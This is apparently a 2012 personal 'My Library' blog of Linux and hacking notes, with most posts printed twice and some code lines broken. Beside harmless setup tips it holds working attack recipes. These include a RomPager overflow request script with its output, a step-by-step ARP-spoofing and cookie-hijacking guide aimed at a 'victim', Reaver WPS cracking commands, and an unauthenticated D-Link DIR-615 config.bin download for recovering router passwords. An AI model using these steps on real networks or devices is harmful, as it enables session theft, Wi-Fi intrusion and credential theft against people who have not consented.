:~# telnet 10.10.1.136
Trying 10.10.1.136...
telnet: Unable to connect to remote host: Connection refused
:~#
CSRF Code
:~# telnet 10.10.1.136
Trying 10.10.1.136...
Connected to 10.10.1.136.
Escape character is '^]'.
IPPHONE login:
Password:
BusyBox v1.6.1 (2010-10-08 16:43:22 CST) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
$
Monday, December 24, 2012
Saturday, December 8, 2012
Skype Webcam Fail on Ubuntu (Solution)
Just for my record only.
Need to install both :-
libv4l-0 - Collection of video4linux support libraries
libv4l-dev - Collection of video4linux support libraries (development files)
#apt-get install libv4l-0
#apt-get install libv4l-dev
===EOF===
Need to install both :-
libv4l-0 - Collection of video4linux support libraries
libv4l-dev - Collection of video4linux support libraries (development files)
#apt-get install libv4l-0
#apt-get install libv4l-dev
===EOF===
Tuesday, December 4, 2012
RomPager Exploit.
# ./get.pl -n 17x.x.x.x
[+] GET Http By Pretorians
[!] Target: 17x.x.x.x
Connecting to 17x.x.x.x
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: RomPager/4.07 UPnP/1.0
#ruby rugbi.rb
End Result
===========
./get.pl -n 17x.x.x.x
[+] GET Http By Pretorians
[!] Target: 17x.x.x.x
|!| Can not connect...
===EOF===
Code
--------
require 'net/https'
url = URI.parse("http://17x.x.x.x/")
data = nil
headers = {
"Host" => "IP",
"Authorization" => "Basic
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$
}
res = Net::HTTP.start(url.host, url.port) do |http|
http.use_ssl = false
http.send_request("GET", url.path, data, headers)
end
puts res.body
[+] GET Http By Pretorians
[!] Target: 17x.x.x.x
Connecting to 17x.x.x.x
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: RomPager/4.07 UPnP/1.0
#ruby rugbi.rb
End Result
===========
./get.pl -n 17x.x.x.x
[+] GET Http By Pretorians
[!] Target: 17x.x.x.x
|!| Can not connect...
===EOF===
Code
--------
require 'net/https'
url = URI.parse("http://17x.x.x.x/")
data = nil
headers = {
"Host" => "IP",
"Authorization" => "Basic
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$
}
res = Net::HTTP.start(url.host, url.port) do |http|
http.use_ssl = false
http.send_request("GET", url.path, data, headers)
end
puts res.body
Wednesday, November 28, 2012
GET HTTP(Proxy / IO:Socket / HTML::LinkExtor)
Latest update was HTML::LinkExtor as below.
#!/usr/bin/perl
############################################
# [+] Get HTTP
# Created
# BY
# Pretorians
#
###########################################
use LWP::Simple;
use Time::localtime;
use LWP::UserAgent;
use IO::Socket;
use HTML::LinkExtor;
##
print "[+] GET Http By Pretorians \n";
##
##
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
if ($type eq "-p") {
print "[!] Target: $t\n";
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 ');
$ua->proxy([(http )] => 'socks://127.0.0.1:9050');
$ua->cookie_jar({});
my $r = $ua->get("http://$t/") or die ("Unable to get page!");
print $r->content;
}}
##
##
if ($type eq "-n") {
print "[!] Target: $t\n";
my $r = ("http://$t/");
my $socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $t,
PeerPort => 80) || die "|!| Can not connect...\n";
print "Connecting to $t\n";
print $socket "GET $t HTTP/1.0\n\n";
$socket->recv(my $data, 1024);
print "$data \n";
close ($socket);
}
##
##
if ($type eq "-e") {
print "[!] Target: $t\n";
my $r = get("http://$t/");
$LinkExtor = HTML::LinkExtor->new(\&links);
$LinkExtor->parse($r);
sub links
{
($tag, %links) = @_;
if ($tag eq "a") {
foreach $key (keys %links) {
if ($key eq "href") {
print "$links{$key}\n";
}
}
}
}
}
##
##
sub usg(){
print "[!] usg: perl get.pl [-p : -n : -e ]\n";
print "[!] -p: With Proxy\n";
print "[!] -n: Without Proxy\n";
print "[!] -e: Link Extractor\n";
}
exit ;
p/s: Now I already have 3 options:
1: With Proxy
2: Without Proxy using IO:Socket
3: A Link Extractor
That why i call my blog My Library where I dump and retrieve info backs for further viewing.At the same time I share it with you guys out there :D
#!/usr/bin/perl
############################################
# [+] Get HTTP
# Created
# BY
# Pretorians
#
###########################################
use LWP::Simple;
use Time::localtime;
use LWP::UserAgent;
use IO::Socket;
use HTML::LinkExtor;
##
print "[+] GET Http By Pretorians \n";
##
##
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
if ($type eq "-p") {
print "[!] Target: $t\n";
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 ');
$ua->proxy([(http )] => 'socks://127.0.0.1:9050');
$ua->cookie_jar({});
my $r = $ua->get("http://$t/") or die ("Unable to get page!");
print $r->content;
}}
##
##
if ($type eq "-n") {
print "[!] Target: $t\n";
my $r = ("http://$t/");
my $socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $t,
PeerPort => 80) || die "|!| Can not connect...\n";
print "Connecting to $t\n";
print $socket "GET $t HTTP/1.0\n\n";
$socket->recv(my $data, 1024);
print "$data \n";
close ($socket);
}
##
##
if ($type eq "-e") {
print "[!] Target: $t\n";
my $r = get("http://$t/");
$LinkExtor = HTML::LinkExtor->new(\&links);
$LinkExtor->parse($r);
sub links
{
($tag, %links) = @_;
if ($tag eq "a") {
foreach $key (keys %links) {
if ($key eq "href") {
print "$links{$key}\n";
}
}
}
}
}
##
##
sub usg(){
print "[!] usg: perl get.pl [-p : -n : -e ]
print "[!] -p: With Proxy\n";
print "[!] -n: Without Proxy\n";
print "[!] -e: Link Extractor\n";
}
exit ;
p/s: Now I already have 3 options:
1: With Proxy
2: Without Proxy using IO:Socket
3: A Link Extractor
That why i call my blog My Library where I dump and retrieve info backs for further viewing.At the same time I share it with you guys out there :D
Monday, November 26, 2012
GET HTTP (Proxy or using IO::Socket)
#!/usr/bin/perl
############################################
# [+] Get HTTP
# Created
# BY
# Pretorians
#
###########################################
use LWP::Simple;
use Time::localtime;
use LWP::UserAgent;
use IO::Socket;
##
print "[+] GET Http \n";
##
##
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
if ($type eq "-p") {
print "[!] Target: $t\n";
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0');
$ua->proxy([(http )] => 'socks://127.0.0.1:9050');
$ua->cookie_jar({});
my $r = $ua->get("http://$t/") or die ("Unable to get page!");
print $r->content;
}}
##
##
if ($type eq "-n") {
print "[!] Target: $t\n";
my $r = ("http://$t/");
my $socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $t,
PeerPort => 80) || die "|!| Can not connect...\n";
print "connecting to $t\n";
print $socket "GET $t HTTP/1.0\n\n";
$socket->recv(my $data, 1024);
print "$data \n";
close ($socket);
}
##
sub usg(){
print "[!] usg: perl get.pl [-p or -n]\n";
print "[!] -p: With Proxy\n";
print "[!] -n: Without Proxy\n";
}
exit ;
I just dump the code in here only.Still the same nothing change..just slot it to make it as an option either choose Get HTTP with proxy or Get HTTP without Proxy.
My main target is only about the HTTP request / date / server name content-type and also a menu to choose either -p or - n :D.Basically for modem.
############################################
# [+] Get HTTP
# Created
# BY
# Pretorians
#
###########################################
use LWP::Simple;
use Time::localtime;
use LWP::UserAgent;
use IO::Socket;
##
print "[+] GET Http \n";
##
##
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
if ($type eq "-p") {
print "[!] Target: $t\n";
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0');
$ua->proxy([(http )] => 'socks://127.0.0.1:9050');
$ua->cookie_jar({});
my $r = $ua->get("http://$t/") or die ("Unable to get page!");
print $r->content;
}}
##
##
if ($type eq "-n") {
print "[!] Target: $t\n";
my $r = ("http://$t/");
my $socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $t,
PeerPort => 80) || die "|!| Can not connect...\n";
print "connecting to $t\n";
print $socket "GET $t HTTP/1.0\n\n";
$socket->recv(my $data, 1024);
print "$data \n";
close ($socket);
}
##
sub usg(){
print "[!] usg: perl get.pl [-p or -n]
print "[!] -p: With Proxy\n";
print "[!] -n: Without Proxy\n";
}
exit ;
I just dump the code in here only.Still the same nothing change..just slot it to make it as an option either choose Get HTTP with proxy or Get HTTP without Proxy.
My main target is only about the HTTP request / date / server name content-type and also a menu to choose either -p or - n :D.Basically for modem.
Friday, November 23, 2012
GET HTTP with Simplified Option(proxy / non-proxy)
#!/usr/bin/perl
############################################
# [+] Get HTTP
# Created
# BY
# Pretorians
#
###########################################
use LWP::Simple;
use Time::localtime;
use LWP::UserAgent;
##
print "[+] GET Http Modem\n";
##
sub timestamp {
my $c = localtime;
return sprintf( "%04d-%02d-%02d_%02d-%02d-%02d",
$c->year + 1900, $c->mon + 1, $c->mday,
$c->hour, $c->min, $c->sec );
}
print '[+] Date: [' . timestamp() . ']'. "\n";
##
##
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
if ($type eq "-p") {
print "[!] Target: $t\n";
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 ');
$ua->proxy([(http )] => 'socks://127.0.0.1:9050');
$ua->cookie_jar({});
my $r = $ua->get("http://$t/") or die ("Unable to get page!");
print $r->content;
}}
if ($type eq "-n") {
print "[!] Target: $t\n";
my $r = getprint("http://$t/") or die ("Unable to get page!");
}
##
sub usg(){
print "[!] usg: perl get.pl [-p or -n]\n";
print "[!] -p: With Proxy\n";
print "[!] -n: Without Proxy\n";
}
exit ;
############################################
# [+] Get HTTP
# Created
# BY
# Pretorians
#
###########################################
use LWP::Simple;
use Time::localtime;
use LWP::UserAgent;
##
print "[+] GET Http Modem\n";
##
sub timestamp {
my $c = localtime;
return sprintf( "%04d-%02d-%02d_%02d-%02d-%02d",
$c->year + 1900, $c->mon + 1, $c->mday,
$c->hour, $c->min, $c->sec );
}
print '[+] Date: [' . timestamp() . ']'. "\n";
##
##
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
if ($type eq "-p") {
print "[!] Target: $t\n";
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 ');
$ua->proxy([(http )] => 'socks://127.0.0.1:9050');
$ua->cookie_jar({});
my $r = $ua->get("http://$t/") or die ("Unable to get page!");
print $r->content;
}}
if ($type eq "-n") {
print "[!] Target: $t\n";
my $r = getprint("http://$t/") or die ("Unable to get page!");
}
##
sub usg(){
print "[!] usg: perl get.pl [-p or -n]
print "[!] -p: With Proxy\n";
print "[!] -n: Without Proxy\n";
}
exit ;
Thursday, November 8, 2012
GET HTTP ( LWP with TOR )
#!/usr/bin/perl
use LWP::Simple;
use Time::localtime;
use LWP::UserAgent;
##
print "[+] GET Http Modem\n";
##
sub timestamp {
my $c = localtime;
return sprintf( "%04d-%02d-%02d_%02d-%02d-%02d",
$c->year + 1900, $c->mon + 1, $c->mday,
$c->hour, $c->min, $c->sec );
}
print '[+] Date: [' . timestamp() . ']'. "\n";
##
##
if (@ARGV == 0) {&usg;}
$t = shift(@ARGV);
{
print "[!] Target: $t\n";
}
##
##
##
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0');
$ua->proxy([(http )] => 'socks://127.0.0.1:9050');
$ua->cookie_jar({});
my $r = $ua->get("http://$t/") or die ("Unable to get page!");
print $r->content;
##
sub usg(){
print "[!] usg: perl get.pl\n";
}
exit ;
p/s :
use LWP::Simple;
use Time::localtime;
use LWP::UserAgent;
##
print "[+] GET Http Modem\n";
##
sub timestamp {
my $c = localtime;
return sprintf( "%04d-%02d-%02d_%02d-%02d-%02d",
$c->year + 1900, $c->mon + 1, $c->mday,
$c->hour, $c->min, $c->sec );
}
print '[+] Date: [' . timestamp() . ']'. "\n";
##
##
if (@ARGV == 0) {&usg;}
$t = shift(@ARGV);
{
print "[!] Target: $t\n";
}
##
##
##
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0');
$ua->proxy([(http )] => 'socks://127.0.0.1:9050');
$ua->cookie_jar({});
my $r = $ua->get("http://$t/") or die ("Unable to get page!");
print $r->content;
##
sub usg(){
print "[!] usg: perl get.pl
}
exit ;
p/s :
Make sure you install the module of LWP::Protocol::socks to make the tor proxy working.
#cpan install
LWP::Protocol::socks
By the way this was simplified just for my own used.Everyone have their own view and style. Please google for more info.
Wednesday, November 7, 2012
GET HTTP (LWP:Simple/Time:LocalTime)
#!/usr/bin/perl
use LWP::Simple;
use Time::localtime;
print "[+] GET Http Modem\n";
##
sub timestamp {
my $c = localtime;
return sprintf( "%04d-%02d-%02d_%02d-%02d-%02d",
$c->year + 1900, $c->mon + 1, $c->mday,
$c->hour, $c->min, $c->sec );
}
print '[+] Date: [' . timestamp() . ']'. "\n";
##
##
if (@ARGV == 0) {&usg;}
$t = shift(@ARGV);
{
print "[!] Target: $t\n";
my $r = getprint("http://$t/") or die ("Unable to get page!");
##
##
}
sub usg(){
print "[!] usg: perl get.pl\n";
}
exit ;
use LWP::Simple;
use Time::localtime;
print "[+] GET Http Modem\n";
##
sub timestamp {
my $c = localtime;
return sprintf( "%04d-%02d-%02d_%02d-%02d-%02d",
$c->year + 1900, $c->mon + 1, $c->mday,
$c->hour, $c->min, $c->sec );
}
print '[+] Date: [' . timestamp() . ']'. "\n";
##
##
if (@ARGV == 0) {&usg;}
$t = shift(@ARGV);
{
print "[!] Target: $t\n";
my $r = getprint("http://$t/") or die ("Unable to get page!");
##
##
}
sub usg(){
print "[!] usg: perl get.pl
}
exit ;
Tuesday, November 6, 2012
GET HTTP (IO::Socket)
#!/usr/bin/perl
use IO::Socket;
my $url = 'www.google.com';
my $socket = IO::Socket::INET->new(
Proto => 'tcp',
PeerAddr => $url,
PeerPort => 80) || die "|!| Can not connect...\n";
print "connecting to $url\n";
print $socket "GET $url HTTP/1.0\n\n";
$socket->recv(my $data, 1024);
print "$data \n";
close ($socket);
Credit to BufferCode
my $url = 'www.google.com';
my $socket = IO::Socket::INET->new(
Proto => 'tcp',
PeerAddr => $url,
PeerPort => 80) || die "|!| Can not connect...\n";
print "connecting to $url\n";
print $socket "GET $url HTTP/1.0\n\n";
$socket->recv(my $data, 1024);
print "$data \n";
close ($socket);
Credit to BufferCode
Monday, October 22, 2012
How to Update Java Plugin
Taken from java.com website.
Enable and Configure
Firefox or Mozilla
To configure the Java Plugin follow these steps:- Exit Firefox browser if it is already running.
- Uninstall any previous installations of Java Plugin.
Only one Java Plugin can be used at a time. When you want to use a different plugin, or version of a plugin, remove the symbolic links to any other versions and create a fresh symbolic link to the new one. - Create a symbolic link to the
libnpjp2.so
file in the browser plugins directory- Go to the plugins sub-directory under the Firefox installation directory
cd
<Firefox installation directory>/plugins
- Create the symbolic link
ln -s
<Java installation directory>/lib/i386/libnpjp2.so
Note: If you are upgrading your Java version then before creating new symbolic link you should remove old symbolic link to enable latest downloaded Java.
To remove old symbolic link:
typecd
<Firefox installation directory>/plugins
rm libjavaplugin_oji.so
Example- If Firefox is installed at this directory:
/usr/lib
/<Firefox installation directory> - And if the Java is installed at this directory:
/usr/java/
<Java installation directory> - Then type in the terminal window to go to the browser plug-in directory:
/usr/lib/mozilla/plugins#
- Enter the following command to create a symbolic link to the Java Plug-in for the Mozilla browser.
ln -s
/home/Pretorians/Documents/Installer/jre1.7.0_25/lib/i386/libnpjp2.so
- Go to the plugins sub-directory under the Firefox installation directory
- Start the Firefox browser, or restart it if it is already up.
In Firefox, type about:plugins in the Location bar to confirm that the Java Plugin is loaded. You can also click the Tools menu to confirm that Java Console is there.
Friday, October 12, 2012
Uniscan Web vulnerability scanner
I recently install Uniscan for a web vulnerability scanner.Below is the step to install Uniscan.
Requirements:
Perl v5.12.3 or later installed on the operating system where the uniscan runs.
you need the following perl modules:
.
Example:
Requirements:
Perl v5.12.3 or later installed on the operating system where the uniscan runs.
you need the following perl modules:
- Moose
- threads
- threads::shared
- Thread::Queue
- HTTP::Response
- HTTP::Request
- LWP::UserAgent
- Net::SSLeay
- Getopt::Std
Example:
# cpan -i Moose # cpan -i threads # cpan -i threads::shared # cpan -i Thread::Queue # cpan -i HTTP::Response # cpan -i HTTP::Request # cpan -i LWP::UserAgent # cpan -i Net::SSLeay # cpan -i Getopt::Std
How to use the uniscan: The uniscan must be run from the command line. Example: perl uniscan.pl -u http://www.example.com/ -d
OPTIONS: -h help -uexample: https://www.example.com/ -f list of url's -b Uniscan go to background -q Enable Directory checks -w Enable File checks -e Enable robots.txt check -d Enable Dynamic checks -s Enable Static checks -r Enable Stress checks -i Bing search -o Google search
You can get the installer at Uniscan Installer
Tuesday, August 28, 2012
CookieInjector using Greasemonkey
Tools
--------
1.Arpspoof
2.Mozilla Browser :)
3.Greasemonkey Addon ;)
4.CookieInjector Script >:)
5.Wireshark
How to Used CookieInjector with Greasemonkey.
==============================
1)Turning on Port Forwarding
$ sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
2)Arpspoof from Gateway towards Victim
$ sudo arpspoof -i wlan0 -t (Victim ip) (Default gateway)
3)Arpspoof from (Victim) towards (Default Gateway)
$ sudo arpspoof -i wlan0 -t (Default gateway) (Victim ip)
4.Fire Up Wireshark and sniff on Wlan0
#wireshark
5.Put in Filter Expression in Wireshark
http.cookie contains datr
6.Copy the cookie with "GET" label
right click--copy--Bytes--Printable Byte Only
7. Hit ALT -C to bring up CookieInjector Script and paste the cookie that being copied.
8.Click Yes and It will overwrite cookies files
9.That is Victim Page..
-=EOS=-
--------
1.Arpspoof
2.Mozilla Browser :)
3.Greasemonkey Addon ;)
4.CookieInjector Script >:)
5.Wireshark
How to Used CookieInjector with Greasemonkey.
==============================
1)Turning on Port Forwarding
$ sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
2)Arpspoof from Gateway towards Victim
$ sudo arpspoof -i wlan0 -t (Victim ip) (Default gateway)
3)Arpspoof from (Victim) towards (Default Gateway)
$ sudo arpspoof -i wlan0 -t (Default gateway) (Victim ip)
4.Fire Up Wireshark and sniff on Wlan0
#wireshark
5.Put in Filter Expression in Wireshark
http.cookie contains datr
6.Copy the cookie with "GET" label
right click--copy--Bytes--Printable Byte Only
7. Hit ALT -C to bring up CookieInjector Script and paste the cookie that being copied.
8.Click Yes and It will overwrite cookies files
9.That is Victim Page..
-=EOS=-
Friday, August 17, 2012
Saturday, August 11, 2012
List of Free DNS.
OpenDNS
======
208.67.222.222
208.67.220.220
Google
=====
8.8.8.8
8.8.4.4
======
208.67.222.222
208.67.220.220
=====
8.8.8.8
8.8.4.4
Wednesday, August 8, 2012
My Library Support Internet Blackout Day !!
114A Evidence Act – The End of Internet Freedom in MALAYSIA?
Hi to All Malaysia,
I Pretorians fully supported stop114a campaign setup by CIJ_Malaysia!
The video self-explain why I supported this campaign.
Internet users are held liable for any content posted through their
registered networks or data processing device, is both unfair and an
attempt to put fear in people.
The amended law will have serious repercussions on Internet use as the
owner of the site or device is presumed guilty and has to fight to prove
his innocence.
For more information kindly go to www.stop114a.wordpress.com or Facebook at https://www.facebook.com/evidenceamendmentact.
Tuesday, July 31, 2012
How to install Reaver-wps in Ubuntu 11.10?
1. wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
2. tar xvf reaver-1.4.tar.gz
3. cd reaver-1.4/
4. ./configure
5. IF got error (error: pcap library not found!)*Move to step 6.
6. apt-get install libsqlite3-dev libpcap0.8-dev build-essential
7. make
8. make install
9. EOF #
* To Run Reaver
=========
Open two terminal
-----------------------
#aireplay-ng wlan0 -1 120 -a 00:01:02:03:04:05 -e cc:2e:13:fc:34:65
#reaver -i wlan0 -A -b 00:01:02:03:04:05 -v -d 1 -x 30 -l 600
Friday, July 20, 2012
How to install TOR in Ubuntu.
I always forgot on how to install TOR.It nothing new.Just for my library archive.
Do not use the packages in Ubuntu's universe. They are unmaintained and out of date. That means you'll be missing stability and security fixes.
You'll need to set up our package repository before you can fetch Tor. First, you need to figure out the name of your distribution. Here's a quick mapping:
Ubuntu 11.04 is "natty"
Ubuntu 10.10 or Trisquel 4.5 is "maverick"
Ubuntu 10.04 or Trisquel 4.0 is "lucid"
Ubuntu 9.10 or Trisquel 3.5 is "karmic"
Ubuntu 9.04 is "jaunty"
Ubuntu 8.10 is "intrepid"
Ubuntu 8.04 is "hardy"
Debian Etch is "etch"
Debian Lenny is "lenny"
Then add this line to your /etc/apt/sources.list file:
deb http://deb.torproject.org/torproject.org main
where you substitute the above word (etch, lenny, sid, karmic, jaunty, intrepid, hardy) in place of.
Then add the gpg key used to sign the packages by running the following commands at your command prompt:
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
Now refresh your sources and install Vidalia by running the following commands at your command prompt:
apt-get update
apt-get install vidalia deb.torproject.org-keyring
*Install TOR in Ubuntu Precise*
- Just add in apt source list.
Courtesy of TorProject
Do not use the packages in Ubuntu's universe. They are unmaintained and out of date. That means you'll be missing stability and security fixes.
You'll need to set up our package repository before you can fetch Tor. First, you need to figure out the name of your distribution. Here's a quick mapping:
Ubuntu 11.04 is "natty"
Ubuntu 10.10 or Trisquel 4.5 is "maverick"
Ubuntu 10.04 or Trisquel 4.0 is "lucid"
Ubuntu 9.10 or Trisquel 3.5 is "karmic"
Ubuntu 9.04 is "jaunty"
Ubuntu 8.10 is "intrepid"
Ubuntu 8.04 is "hardy"
Debian Etch is "etch"
Debian Lenny is "lenny"
Then add this line to your /etc/apt/sources.list file:
deb http://deb.torproject.org/torproject.org
where you substitute the above word (etch, lenny, sid, karmic, jaunty, intrepid, hardy) in place of
Then add the gpg key used to sign the packages by running the following commands at your command prompt:
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
Now refresh your sources and install Vidalia by running the following commands at your command prompt:
apt-get update
apt-get install vidalia deb.torproject.org-keyring
deb http://deb.torproject.org/torproject.org experimental-precise main
Courtesy of TorProject
Thursday, July 19, 2012
How to Setup and Configure Metasploit-4.4.0
Go and download the latest version at Metasploit 4.4.0
open your terminal and find the install that you save and type chmod +x metasploit-latest-linux-installer.run to make the file executable.
then you type it ./metasploit-latest-linux-installer.run and ENTER.
setup it and depend on which directory you prefer to put.As a default it will put inside opt/metasploit-4.4.0/
After finish installing you can register it or you may run in inside the terminal.Its all depends on you guys.
How to Update
==============
root@Blog:/usr/local/bin# chmod +x msfupdate
root@Blog:/usr/local/bin# ./msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]
Updating '.':
Updated to revision 15655.
ps: This installation guide i do it myself after my OS crash.I do a fresh installation of this Metasploit-4.4.0 inside my box.You may refer to Metasploit Blog if you got any question or doubt.If my guide may or can crash you box..im not responsible of it :)
open your terminal and find the install that you save and type chmod +x metasploit-latest-linux-installer.run to make the file executable.
then you type it ./metasploit-latest-linux-installer.run and ENTER.
setup it and depend on which directory you prefer to put.As a default it will put inside opt/metasploit-4.4.0/
After finish installing you can register it or you may run in inside the terminal.Its all depends on you guys.
How to Update
==============
root@Blog:/usr/local/bin# chmod +x msfupdate
root@Blog:/usr/local/bin# ./msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]
Updating '.':
Updated to revision 15655.
ps: This installation guide i do it myself after my OS crash.I do a fresh installation of this Metasploit-4.4.0 inside my box.You may refer to Metasploit Blog if you got any question or doubt.If my guide may or can crash you box..im not responsible of it :)
Thursday, July 12, 2012
How to Get Wifi Signal Strength Indication
In Percentage
while [ 1 ];do clear;a=$(/sbin/iwconfig wlan0 | grep "Link Quality" | awk '{print $2}' | sed 's/.*\=//'); echo $(($((${a%/*} * 100)) / ${a#*/}))%;sleep 1;done
In Normal way
iwconfig wlan0 | grep "Link Quality"
while [ 1 ];do clear;a=$(/sbin/iwconfig wlan0 | grep "Link Quality" | awk '{print $2}' | sed 's/.*\=//'); echo $(($((${a%/*} * 100)) / ${a#*/}))%;sleep 1;done
In Normal way
iwconfig wlan0 | grep "Link Quality"
Thursday, July 5, 2012
D-Link (DIR-615) Vulnerability .How to?
Prerequisites :
1. A DIR-615 G1/G2 router with firmware 7.05x
2. A network connection to the router (Private)http://192.168.1.1 or (Public)http://123.456.46.16.
3. RouterPassView - This is the main tool here which performs the decryption/decompression of the router configuration file. Download it here :RouterPassView Software
How To.(Steps)
=============
1. Visit your router's web configuration address. By default its either http://192.168.1.1 or http://192.168.0.1 or http://123.456.46.16 .
2. Once you can see the login page (you do not have to be logged in), append '/config.bin' to the back of the URL and visit that page (example : http://192.168.1.1/config.bin).
3. A file download for 'config.bin' should begin. Save the file to your computer.
4. Run RouterPassView.
5. Open the downloaded 'config.bin' in RouterPassView.. you should be able to see a table with some valid values.
6. And THAT IS YOUR Key for the padlock!!!
1. A DIR-615 G1/G2 router with firmware 7.05x
2. A network connection to the router (Private)http://192.168.1.1 or (Public)http://123.456.46.16.
3. RouterPassView - This is the main tool here which performs the decryption/decompression of the router configuration file. Download it here :RouterPassView Software
How To.(Steps)
=============
1. Visit your router's web configuration address. By default its either http://192.168.1.1 or http://192.168.0.1 or http://123.456.46.16 .
2. Once you can see the login page (you do not have to be logged in), append '/config.bin' to the back of the URL and visit that page (example : http://192.168.1.1/config.bin).
3. A file download for 'config.bin' should begin. Save the file to your computer.
4. Run RouterPassView.
5. Open the downloaded 'config.bin' in RouterPassView.. you should be able to see a table with some valid values.
6. And THAT IS YOUR Key for the padlock!!!
Wednesday, July 4, 2012
Make your DNS Static/Permanent in Ubuntu 11.04.How to?
Easier way out would be to edit /etc/resolv.conf and add your DNS records like this:
nameserver 8.8.8.8
nameserver 8.8.4.4
Then run sudo chattr +i /etc/resolv.conf to stop NetworkManager from overwriting the file.
To normalize back so that the dhcp can overwrite the name server you need to type
sudo chattr -i /etc/resolv.conf
nameserver 8.8.8.8
nameserver 8.8.4.4
Then run sudo chattr +i /etc/resolv.conf to stop NetworkManager from overwriting the file.
To normalize back so that the dhcp can overwrite the name server you need to type
sudo chattr -i /etc/resolv.conf
Monday, June 25, 2012
CCTV NetSurveillance Active X Control-Solution
1. Download and install dvrcenter.com/ocx/Active.exe
2. Goto C:\Windows and create directory 'NetSurveillance'
3. Download NetSurveillance.zip from the following link and extract contents to C:\Windows\NetSurveillance (NetSurveillance.zip)
4. Run 'install.bat' with administrator priviledges
5. Navigate to the IP or Dyndns name to remote access your DVR
6. Allow access to run Active X Controls
7. Log in to your DVR!!
NB: Active X controls may need to changed via Internet Explorer to allow IE to prompt you. SImply change the appropriate active X settings in IE ->Internet Option->Security->Custom Level to either enable or prompt.
Credit to kryptic00
2. Goto C:\Windows and create directory 'NetSurveillance'
3. Download NetSurveillance.zip from the following link and extract contents to C:\Windows\NetSurveillance (NetSurveillance.zip)
4. Run 'install.bat' with administrator priviledges
5. Navigate to the IP or Dyndns name to remote access your DVR
6. Allow access to run Active X Controls
7. Log in to your DVR!!
NB: Active X controls may need to changed via Internet Explorer to allow IE to prompt you. SImply change the appropriate active X settings in IE ->Internet Option->Security->Custom Level to either enable or prompt.
Credit to kryptic00
Thursday, April 26, 2012
Friday, April 20, 2012
Wednesday, March 7, 2012
How to check 3G modem RSSI Signal Quality
I used minicom and set it to 9600 baud rate and also must set the serial device to tty/USB on which your USB detected.
Below is the details.
=====================
Signal quality
Command: AT+CSQ
Response: +CSQ:,
Description: Returns signal quality.
Received Signal Strength Indicator
0
-113 dBm or less
1
-111 dBm
2 to 30
-109 to -53 dBm
31
-51 dBm or greater
99
not known or not detectable
Bit Error Rate, in percent 0..7.
99 not known or not detectable
A note on the RSSI (received signal strength), dBm is a decibel (logarithmic) scale with a reference of 1 milliwatt thus 0 dBm equals a received signal of 1 mW.
Signal strength is usually lower than 1 mW and therefore below 0, so the larger (closer to 0) the better signal strength.
You can convert the RSSI to dBM with
dBm = (rssi \times 2) - 113
Example
>AT+CSQ=?
+CSQ: (0-31,99),(99)
OK
>AT+CSQ
+CSQ: 14,99
Courtesy of Shapeshifter
Below is the details.
=====================
Signal quality
Command: AT+CSQ
Response: +CSQ:
Description: Returns signal quality.
0
-113 dBm or less
1
-111 dBm
2 to 30
-109 to -53 dBm
31
-51 dBm or greater
99
not known or not detectable
99 not known or not detectable
A note on the RSSI (received signal strength), dBm is a decibel (logarithmic) scale with a reference of 1 milliwatt thus 0 dBm equals a received signal of 1 mW.
Signal strength is usually lower than 1 mW and therefore below 0, so the larger (closer to 0) the better signal strength.
You can convert the RSSI to dBM with
dBm = (rssi \times 2) - 113
Example
>AT+CSQ=?
+CSQ: (0-31,99),(99)
OK
>AT+CSQ
+CSQ: 14,99
Courtesy of Shapeshifter
Monday, January 16, 2012
Social Engineer Toolkit (SET) Intergration with Metasploit 4.4.0
Download your copy of SET at below link.
svn co http://svn.trustedsec.com/social_engineering_toolkit set/
Computer Based Social Engineering Tools: Social Engineer Toolkit (SET)
